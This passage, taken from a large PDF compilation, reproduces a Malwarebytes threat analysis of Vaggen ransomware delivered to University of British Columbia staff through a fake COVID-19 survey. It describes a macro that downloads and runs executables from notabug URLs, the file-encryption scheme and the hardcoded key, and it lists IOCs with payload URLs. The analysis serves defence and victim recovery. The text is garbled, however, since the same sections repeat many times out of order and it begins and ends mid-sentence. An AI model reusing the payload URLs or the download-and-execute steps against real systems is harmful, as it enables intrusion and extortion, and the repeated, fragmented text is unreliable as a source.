event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2223 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2224 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2225 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2226 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2227 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2228 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2229 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2230 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2231 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2232 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2233 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2234 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2235 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2236 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2237 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2238 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2239 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2240 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2241 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2242 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2243 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2244 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2245 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2246 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2247 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2248 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2249 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2250 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2251 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2252 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2253 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2254 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, 